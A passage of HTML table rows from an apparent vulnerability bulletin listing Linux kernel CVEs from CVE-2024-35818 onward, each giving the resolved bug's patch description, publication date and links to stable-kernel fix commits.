<td>In the Linux kernel, the following vulnerability has been resolved: LoongArch: Define the __io_aw() hook as mmiowb() Commit fb24ea52f78e0d595852e ("drivers: Remove explicit invocations of mmiowb()") remove all mmiowb() in drivers, but it says: "NOTE: mmiowb() has only ever guaranteed ordering in conjunction with spin_unlock(). However, pairing each mmiowb() removal in this patch with the corresponding call to spin_unlock() is not at all trivial, so there is a small chance that this change may regress any drivers incorrectly relying on mmiowb() to order MMIO writes between CPUs using lock-free synchronisation." The mmio in radeon_ring_commit() is protected by a mutex rather than a spinlock, but in the mutex fastpath it behaves similar to spinlock. We can add mmiowb() calls in the radeon driver but the maintainer says he doesn't like such a workaround, and radeon is not the only example of mutex protected mmio. So we should extend the mmiowb tracking system from spinlock to mutex, and maybe other locking primitives. This is not easy and error prone, so we solve it in the architectural code, by simply defining the __io_aw() hook as mmiowb(). And we no longer need to override queued_spin_unlock() so use the generic definition. Without this, we get such an error when run 'glxgears' on weak ordering architectures such as LoongArch: radeon 0000:04:00.0: ring 0 stalled for more than 10324msec radeon 0000:04:00.0: ring 3 stalled for more than 10240msec radeon 0000:04:00.0: GPU lockup (current fence id 0x000000000001f412 last fence id 0x000000000001f414 on ring 3) radeon 0000:04:00.0: GPU lockup (current fence id 0x000000000000f940 last fence id 0x000000000000f941 on ring 0) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35) radeon 0000:04:00.0: scheduling IB failed (-35). [drm:radeon_gem_va_ioctl [radeon]] *ERROR* Couldn't update BO_VA (-35)</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35818" target="_blank">CVE-2024-35818</a><br><a href="https://git.kernel.org/stable/c/0b61a7dc6712b78799b3949997e8a5e94db5c4b0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/97cd43ba824aec764f5ea2790d0c0a318f885167" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9adec248bba33b1503252caf8e59d81febfc5ceb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9c68ece8b2a5c5ff9b2fcaea923dd73efeb174cd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d7d7c6cdea875be3b241d7d39873bb431db7154d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: soc: fsl: qbman: Use raw spinlock for cgr_lock smp_call_function always runs its callback in hard IRQ context, even on PREEMPT_RT, where spinlocks can sleep. So we need to use a raw spinlock for cgr_lock to ensure we aren't waiting on a sleeping task. Although this bug has existed for a while, it was not apparent until commit ef2a8d5478b9 ("net: dpaa: Adjust queue depth on rate change") which invokes smp_call_function_single via qman_update_cgr_safe every time a link goes up or down.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35819" target="_blank">CVE-2024-35819</a><br><a href="https://git.kernel.org/stable/c/2b3fede8225133671ce837c0d284804aa3bc7a02" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/32edca2f03a6cc42c650ddc3ad83d086e3f365d1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/54d26adf64c04f186098b39dba86b86037084baa" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a3ca8292ce9fdcce122706c28c3f07bc857fe5e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cd53a8ae5aacb4ecd25088486dea1cd02e74b506" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f39d36b7540cf0088ed7ce2de2794f2aa237f6df" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fbec4e7fed89b579f2483041fabf9650fb0dd6bc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ff50716b7d5b7985979a5b21163cd79fb3d21d59" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: io_uring: fix io_queue_proc modifying req-&gt;flags With multiple poll entries __io_queue_proc() might be running in parallel with poll handlers and possibly task_work, we should not be carelessly modifying req-&gt;flags there. io_poll_double_prepare() handles a similar case with locking but it's much easier to move it into __io_arm_poll_handler().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35820" target="_blank">CVE-2024-35820</a><br><a href="https://git.kernel.org/stable/c/0ecb8919469e6d5c74eea24086b34ce1bda5aef7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1a8ec63b2b6c91caec87d4e132b1f71b5df342be" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/51a490a7f63cae0754120e7c04f4f47920bd48db" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ubifs: Set page uptodate in the correct place Page cache reads are lockless, so setting the freshly allocated page uptodate before we've overwritten it with the data it's supposed to have in it will allow a simultaneous reader to see old data. Move the call to SetPageUptodate into ubifs_write_end(), which is after we copied the new data into the page.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35821" target="_blank">CVE-2024-35821</a><br><a href="https://git.kernel.org/stable/c/142d87c958d9454c3cffa625fab56f3016e8f9f3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/17772bbe9cfa972ea1ff827319f6e1340de76566" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4aa554832b9dc9e66249df75b8f447d87853e12e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/723012cab779eee8228376754e22c6594229bf8f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/778c6ad40256f1c03244fc06d7cdf71f6b5e7310" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8f599ab6fabbca4c741107eade70722a98adfd9f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f19b1023a3758f40791ec166038d6411c8894ae3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fc99f4e2d2f1ce766c14e98463c2839194ae964f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb: udc: remove warning when queue disabled ep It is possible trigger below warning message from mass storage function, WARNING: CPU: 6 PID: 3839 at drivers/usb/gadget/udc/core.c:294 usb_ep_queue+0x7c/0x104 pc : usb_ep_queue+0x7c/0x104 lr : fsg_main_thread+0x494/0x1b3c Root cause is mass storage function try to queue request from main thread, but other thread may already disable ep when function disable. As there is no function failure in the driver, in order to avoid effort to fix warning, change WARN_ON_ONCE() in usb_ep_queue() to pr_debug().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35822" target="_blank">CVE-2024-35822</a><br><a href="https://git.kernel.org/stable/c/2a587a035214fa1b5ef598aea0b81848c5b72e5e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2b002c308e184feeaeb72987bca3f1b11e5f70b8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/30511676eb54d480d014352bf784f02577a10252" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/36177c2595df12225b95ce74eb1ac77b43d5a58c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3e944ddc17c042945d983e006df7860687a8849a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/68d951880d0c52c7f13dcefb5501b69b8605ce8c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/99731076722eb7ed26b0c87c879da7bb71d24290" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/df5cbb908f1687e8ab97e222a16b7890d5501acf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f74c5e0b54b02706d9a862ac6cddade30ac86bcf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: vt: fix unicode buffer corruption when deleting characters This is the same issue that was fixed for the VGA text buffer in commit 39cdb68c64d8 ("vt: fix memory overlapping when deleting chars in the buffer"). The cure is also the same i.e. replace memcpy() with memmove() due to the overlaping buffers.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35823" target="_blank">CVE-2024-35823</a><br><a href="https://git.kernel.org/stable/c/0190d19d7651c08abc187dac3819c61b726e7e3f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1581dafaf0d34bc9c428a794a22110d7046d186d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1ce408f75ccf1e25b3fddef75cca878b55f2ac90" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2933b1e4757a0a5c689cf48d80b1a2a85f237ff1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7529cbd8b5f6697b369803fe1533612c039cabda" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/994a1e583c0c206c8ca7d03334a65b79f4d8bc51" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fc7dfe3d123f00e720be80b920da287810a1f37d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ff7342090c1e8c5a37015c89822a68b275b46f8a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: misc: lis3lv02d_i2c: Fix regulators getting en-/dis-abled twice on suspend/resume When not configured for wakeup lis3lv02d_i2c_suspend() will call lis3lv02d_poweroff() even if the device has already been turned off by the runtime-suspend handler and if configured for wakeup and the device is runtime-suspended at this point then it is not turned back on to serve as a wakeup source. Before commit b1b9f7a49440 ("misc: lis3lv02d_i2c: Add missing setting of the reg_ctrl callback"), lis3lv02d_poweroff() failed to disable the regulators which as a side effect made calling poweroff() twice ok. Now that poweroff() correctly disables the regulators, doing this twice triggers a WARN() in the regulator core: unbalanced disables for regulator-dummy WARNING: CPU: 1 PID: 92 at drivers/regulator/core.c:2999 _regulator_disable ... Fix lis3lv02d_i2c_suspend() to not call poweroff() a second time if already runtime-suspended and add a poweron() call when necessary to make wakeup work. lis3lv02d_i2c_resume() has similar issues, with an added weirness that it always powers on the device if it is runtime suspended, after which the first runtime-resume will call poweron() again, causing the enabled count for the regulator to increase by 1 every suspend/resume. These unbalanced regulator_enable() calls cause the regulator to never be turned off and trigger the following WARN() on driver unbind: WARNING: CPU: 1 PID: 1724 at drivers/regulator/core.c:2396 _regulator_put Fix this by making lis3lv02d_i2c_resume() mirror the new suspend().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35824" target="_blank">CVE-2024-35824</a><br><a href="https://git.kernel.org/stable/c/4154e767354140db7804207117e7238fb337b0e7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/997ca415384612c8df76d99d9a768e0b3f42b325" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ac3e0384073b2408d6cb0d972fee9fcc3776053d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f6df761182fc953907b18aba5049fc2a044ecb45" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb: gadget: ncm: Fix handling of zero block length packets While connecting to a Linux host with CDC_NCM_NTB_DEF_SIZE_TX set to 65536, it has been observed that we receive short packets, which come at interval of 5-10 seconds sometimes and have block length zero but still contain 1-2 valid datagrams present. According to the NCM spec: "If wBlockLength = 0x0000, the block is terminated by a short packet. In this case, the USB transfer must still be shorter than dwNtbInMaxSize or dwNtbOutMaxSize. If exactly dwNtbInMaxSize or dwNtbOutMaxSize bytes are sent, and the size is a multiple of wMaxPacketSize for the given pipe, then no ZLP shall be sent. wBlockLength= 0x0000 must be used with extreme care, because of the possibility that the host and device may get out of sync, and because of test issues. wBlockLength = 0x0000 allows the sender to reduce latency by starting to send a very large NTB, and then shortening it when the sender discovers that there's not sufficient data to justify sending a large NTB" However, there is a potential issue with the current implementation, as it checks for the occurrence of multiple NTBs in a single giveback by verifying if the leftover bytes to be processed is zero or not. If the block length reads zero, we would process the same NTB infintely because the leftover bytes is never zero and it leads to a crash. Fix this by bailing out if block length reads zero.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35825" target="_blank">CVE-2024-35825</a><br><a href="https://git.kernel.org/stable/c/6b2c73111a252263807b7598682663dc33aa4b4c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7664ee8bd80309b90d53488b619764f0a057f2b7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/92b051b87658df7649ffcdef522593f21a2b296b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a0f77b5d6067285b8eca0ee3bd1e448a6258026f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a766761d206e7c36d7526e0ae749949d17ca582c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e2dbfea520e60d58e0c498ba41bde10452257779" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: block: Fix page refcounts for unaligned buffers in __bio_release_pages() Fix an incorrect number of pages being released for buffers that do not start at the beginning of a page.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35826" target="_blank">CVE-2024-35826</a><br><a href="https://git.kernel.org/stable/c/242006996d15f5ca62e22f8c7de077d9c4a8f367" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/38b43539d64b2fa020b3b9a752a986769f87f7a6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7d3765550374f71248c55e6206ea1d6fd4537e65" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c9d3d2fbde9b8197bce88abcbe8ee8e713ffe7c2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ecbd9ced84dd655a8f4cd49d2aad0e80dbf6bf35" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: io_uring/net: fix overflow check in io_recvmsg_mshot_prep() The "controllen" variable is type size_t (unsigned long). Casting it to int could lead to an integer underflow. The check_add_overflow() function considers the type of the destination which is type int. If we add two positive values and the result cannot fit in an integer then that's counted as an overflow. However, if we cast "controllen" to an int and it turns negative, then negative values *can* fit into an int type so there is no overflow. Good: 100 + (unsigned long)-4 = 96 &lt;-- overflow Bad: 100 + (int)-4 = 96 &lt;-- no overflow I deleted the cast of the sizeof() as well. That's not a bug but the cast is unnecessary.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35827" target="_blank">CVE-2024-35827</a><br><a href="https://git.kernel.org/stable/c/0c8c74bb59e7d77554016efc34c2d10376985e5e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/59a534690ecc3af72c6ab121aeac1237a4adae66" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/868ec868616438df487b9e2baa5a99f8662cc47c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8ede3db5061bb1fe28e2c9683329aafa89d2b1b4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b6563ad0d599110bd5cf8f56c47d279c3ed796fe" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: libertas: fix some memleaks in lbs_allocate_cmd_buffer() In the for statement of lbs_allocate_cmd_buffer(), if the allocation of cmdarray[i].cmdbuf fails, both cmdarray and cmdarray[i].cmdbuf needs to be freed. Otherwise, there will be memleaks in lbs_allocate_cmd_buffer().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35828" target="_blank">CVE-2024-35828</a><br><a href="https://git.kernel.org/stable/c/4d99d267da3415db2124029cb5a6d2d955ca43f9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5f0e4aede01cb01fa633171f0533affd25328c3a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8e243ac649c10922a6b4855170eaefe4c5b3faab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/96481624fb5a6319079fb5059e46dbce43a90186" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bea9573c795acec5614d4ac2dcc7b3b684cea5bf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d219724d4b0ddb8ec7dfeaed5989f23edabaf591" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/da10f6b7918abd5b4bc5c9cb66f0fc6763ac48f3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e888c4461e109f7b93c3522afcbbaa5a8fdf29d2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f0dd27314c7afe34794c2aa19dd6f2d30eb23bc7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/lima: fix a memleak in lima_heap_alloc When lima_vm_map_bo fails, the resources need to be deallocated, or there will be memleaks.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35829" target="_blank">CVE-2024-35829</a><br><a href="https://git.kernel.org/stable/c/04ae3eb470e52a3c41babe85ff8cee195e4dcbea" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4ab14eccf5578af1dd5668a5f2d771df27683cab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/746606d37d662c70ae1379fc658ee9c65f06880f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8e25c0ee5665e8a768b8e21445db1f86e9156eb7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ec6bb037e4a35fcbb5cd7bc78242d034ed893fcd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f2e80ac9344aebbff576453d5c0290b332e187ed" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f6d51a91b41704704e395de6839c667b0f810bbf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: media: tc358743: register v4l2 async device only after successful setup Ensure the device has been setup correctly before registering the v4l2 async device, thus allowing userspace to access.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35830" target="_blank">CVE-2024-35830</a><br><a href="https://git.kernel.org/stable/c/17c2650de14842c25c569cbb2126c421489a3a24" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4f1490a5d7a0472ee5d9f36547bc4ba46be755c7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/610f20e5cf35ca9c0992693cae0dd8643ce932e7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/87399f1ff92203d65f1febf5919429f4bb613a02" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8ba8db9786b55047df5ad3db3e01dd886687a77d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b8505a1aee8f1edc9d16d72ae09c93de086e2a1a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c915c46a25c3efb084c4f5e69a053d7f7a635496" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/daf21394f9898fb9f0698c3e50de08132d2164e6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/edbb3226c985469a2f8eb69885055c9f5550f468" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: io_uring: Fix release of pinned pages when __io_uaddr_map fails Looking at the error path of __io_uaddr_map, if we fail after pinning the pages for any reasons, ret will be set to -EINVAL and the error handler won't properly release the pinned pages. I didn't manage to trigger it without forcing a failure, but it can happen in real life when memory is heavily fragmented.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35831" target="_blank">CVE-2024-35831</a><br><a href="https://git.kernel.org/stable/c/0b6f39c175ba5f0ef72bdb3b9d2a06ad78621d62" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4d376d7ad62b6a8e8dfff56b559d9d275e5b9b3a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/67d1189d1095d471ed7fa426c7e384a7140a5dd7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/712e2c8415f55a4a4ddaa98a430b87f624109f69" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: bcachefs: kvfree bch_fs::snapshots in bch2_fs_snapshots_exit bch_fs::snapshots is allocated by kvzalloc in __snapshot_t_mut. It should be freed by kvfree not kfree. Or umount will triger: [ 406.829178 ] BUG: unable to handle page fault for address: ffffe7b487148008 [ 406.830676 ] #PF: supervisor read access in kernel mode [ 406.831643 ] #PF: error_code(0x0000) - not-present page [ 406.832487 ] PGD 0 P4D 0 [ 406.832898 ] Oops: 0000 [#1] PREEMPT SMP PTI [ 406.833512 ] CPU: 2 PID: 1754 Comm: umount Kdump: loaded Tainted: G OE 6.7.0-rc7-custom+ #90 [ 406.834746 ] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014 [ 406.835796 ] RIP: 0010:kfree+0x62/0x140 [ 406.836197 ] Code: 80 48 01 d8 0f 82 e9 00 00 00 48 c7 c2 00 00 00 80 48 2b 15 78 9f 1f 01 48 01 d0 48 c1 e8 0c 48 c1 e0 06 48 03 05 56 9f 1f 01 &lt;48&gt; 8b 50 08 48 89 c7 f6 c2 01 0f 85 b0 00 00 00 66 90 48 8b 07 f6 [ 406.837810 ] RSP: 0018:ffffb9d641607e48 EFLAGS: 00010286 [ 406.838213 ] RAX: ffffe7b487148000 RBX: ffffb9d645200000 RCX: ffffb9d641607dc4 [ 406.838738 ] RDX: 000065bb00000000 RSI: ffffffffc0d88b84 RDI: ffffb9d645200000 [ 406.839217 ] RBP: ffff9a4625d00068 R08: 0000000000000001 R09: 0000000000000001 [ 406.839650 ] R10: 0000000000000001 R11: 000000000000001f R12: ffff9a4625d4da80 [ 406.840055 ] R13: ffff9a4625d00000 R14: ffffffffc0e2eb20 R15: 0000000000000000 [ 406.840451 ] FS: 00007f0a264ffb80(0000) GS:ffff9a4e2d500000(0000) knlGS:0000000000000000 [ 406.840851 ] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 406.841125 ] CR2: ffffe7b487148008 CR3: 000000018c4d2000 CR4: 00000000000006f0 [ 406.841464 ] Call Trace: [ 406.841583 ] &lt;TASK&gt; [ 406.841682 ] ? __die+0x1f/0x70 [ 406.841828 ] ? page_fault_oops+0x159/0x470 [ 406.842014 ] ? fixup_exception+0x22/0x310 [ 406.842198 ] ? exc_page_fault+0x1ed/0x200 [ 406.842382 ] ? asm_exc_page_fault+0x22/0x30 [ 406.842574 ] ? bch2_fs_release+0x54/0x280 [bcachefs] [ 406.842842 ] ? kfree+0x62/0x140 [ 406.842988 ] ? kfree+0x104/0x140 [ 406.843138 ] bch2_fs_release+0x54/0x280 [bcachefs] [ 406.843390 ] kobject_put+0xb7/0x170 [ 406.843552 ] deactivate_locked_super+0x2f/0xa0 [ 406.843756 ] cleanup_mnt+0xba/0x150 [ 406.843917 ] task_work_run+0x59/0xa0 [ 406.844083 ] 